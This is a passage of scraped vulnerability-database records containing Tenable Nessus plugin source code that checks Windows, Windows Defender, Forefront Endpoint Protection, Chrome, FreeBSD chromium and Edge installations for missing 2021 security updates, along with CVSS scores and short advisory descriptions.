script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003638'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'14393',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003638])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-28T14:59:36", "description": "The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host is equal or prior to 1.1.17800.5. It is, therefore, affected by multiple vulnerabilities.\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-31985) \n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-31978)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "Security Update for Forefront Endpoint Protection (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31978", "CVE-2021-31985"], "modified": "2021-08-12T00:00:00", "cpe": ["cpe:/a:microsoft:system_center_endpoint_protection"], "id": "SMB_NT_MS21_JUNE_FEP.NASL", "href": "https://www.tenable.com/plugins/nessus/150361", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150361);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/12\");\n\n script_cve_id(\"CVE-2021-31978\", \"CVE-2021-31985\");\n script_xref(name:\"IAVA\", value:\"2021-A-0273-S\");\n\n script_name(english:\"Security Update for Forefront Endpoint Protection (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host\nis equal or prior to 1.1.17800.5. It is, therefore, affected by multiple vulnerabilities.\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-31985)\n \n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected \n component to deny system or application services. (CVE-2021-31978)\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db0f474f\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31978\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51ebd435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31985\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:system_center_endpoint_protection\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"fep_installed.nasl\");\n script_require_keys(\"installed_sw/Forefront Endpoint Protection\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Forefront Endpoint Protection';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if we got the Malware Engine Version\nif (isnull(app_info['engine_version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'fixed_version':'1.1.18200.3'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, check:'engine_version');\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T14:33:03", "description": "The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host is equal or prior to 1.1.17800.5. It is, therefore, affected by multiple vulnerabilities. \n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-31985) \n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-31978)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "Security Update for Windows Defender (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31978", "CVE-2021-31985"], "modified": "2021-08-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:windows_defender"], "id": "SMB_NT_MS21_JUNE_WIN_DEFENDER.NASL", "href": "https://www.tenable.com/plugins/nessus/150359", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150359);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/12\");\n\n script_cve_id(\"CVE-2021-31978\", \"CVE-2021-31985\");\n script_xref(name:\"IAVA\", value:\"2021-A-0273-S\");\n\n script_name(english:\"Security Update for Windows Defender (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis equal or prior to 1.1.17800.5. It is, therefore, affected by multiple vulnerabilities. \n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-31985)\n \n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected \n component to deny system or application services. (CVE-2021-31978)\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db0f474f\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31978\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51ebd435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31985\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_defender\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_windows_defender_win_installed.nbin\");\n script_require_keys(\"installed_sw/Windows Defender\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Windows Defender';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if disabled\nif (!isnull(app_info['Disabled']))\n exit(0,'Windows Defender is disabled.');\n\n# Check if we got the Malware Engine Version\nif (isnull(app_info['Engine Version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'fixed_version':'1.1.18200.3'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, check:'Engine Version');\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:28", "description": "The version of Google Chrome installed on the remote macOS host is prior to 90.0.4430.85. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Google Chrome < 90.0.4430.85 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_90_0_4430_85.NASL", "href": "https://www.tenable.com/plugins/nessus/148849", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148849);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0187-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Google Chrome < 90.0.4430.85 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 90.0.4430.85. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?70d7f7db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1194046\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195777\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1197904\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 90.0.4430.85 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'90.0.4430.85', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:37", "description": "Chrome Reelases reports :\n\nThis release includes 7 security fixes, including :\n\n- 1194046] High CVE-2021-21222: Heap buffer overflow in V8. Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-03-30\n\n- [1195308] High CVE-2021-21223: Integer overflow in Mojo. Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-04-02\n\n- [1195777] High CVE-2021-21224: Type Confusion in V8. Reported by Jose Martinez (tr0y4) from VerSprite Inc. on 2021-04-05\n\n- [1195977] High CVE-2021-21225: Out of bounds memory access in V8.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-05\n\n- [1197904] High CVE-2021-21226: Use after free in navigation.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-11", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-22T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (cb13a765-a277-11eb-97a0-e09467587c17)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_CB13A765A27711EB97A0E09467587C17.NASL", "href": "https://www.tenable.com/plugins/nessus/148931", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(148931);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (cb13a765-a277-11eb-97a0-e09467587c17)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Chrome Reelases reports :\n\nThis release includes 7 security fixes, including :\n\n- 1194046] High CVE-2021-21222: Heap buffer overflow in V8. Reported\nby Guang Gong of Alpha Lab, Qihoo 360 on 2021-03-30\n\n- [1195308] High CVE-2021-21223: Integer overflow in Mojo. Reported by\nGuang Gong of Alpha Lab, Qihoo 360 on 2021-04-02\n\n- [1195777] High CVE-2021-21224: Type Confusion in V8. Reported by\nJose Martinez (tr0y4) from VerSprite Inc. on 2021-04-05\n\n- [1195977] High CVE-2021-21225: Out of bounds memory access in V8.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-05\n\n- [1197904] High CVE-2021-21226: Use after free in navigation.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-11\"\n );\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?70d7f7db\"\n );\n # https://vuxml.freebsd.org/freebsd/cb13a765-a277-11eb-97a0-e09467587c17.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?be54099d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<90.0.4430.85\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:48", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 90.0.818.46. It is, therefore, affected by multiple vulnerabilities as referenced in the April 22, 2021 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-22T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 90.0.818.46 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_90_0_818_46.NASL", "href": "https://www.tenable.com/plugins/nessus/148939", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148939);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 90.0.818.46 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 90.0.818.46. It is, therefore, affected\nby multiple vulnerabilities as referenced in the April 22, 2021 advisory. Note that Nessus has not tested for this issue\nbut has instead relied only on the application's self-reported version number.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#april-22-2021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0027f192\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21222\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21224\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21225\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21226\");\n 